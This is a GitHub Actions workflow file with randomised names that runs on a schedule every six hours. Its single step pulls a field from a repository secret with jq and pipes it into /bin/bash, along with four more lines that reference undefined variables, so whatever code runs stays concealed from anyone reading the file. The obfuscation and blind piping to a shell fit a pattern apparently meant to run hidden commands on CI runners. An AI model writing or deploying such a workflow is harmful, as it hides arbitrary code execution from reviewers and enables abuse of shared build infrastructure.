name: gaoyaguo2603
on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaoyaguo2603
        env:
          q02294: ${{ secrets.q02294 }}
        run: |
          echo $q02294 | jq -r .wttpk1611 | /bin/bash
          echo $mh55393 | jq -r .ri79 | /bin/bash
          echo $tkcs749 | jq -r .mvosy649 | /bin/bash
          echo $atu46358 | jq -r .bz229 | /bin/bash
          echo $al29009 | jq -r .u0743 | /bin/bash

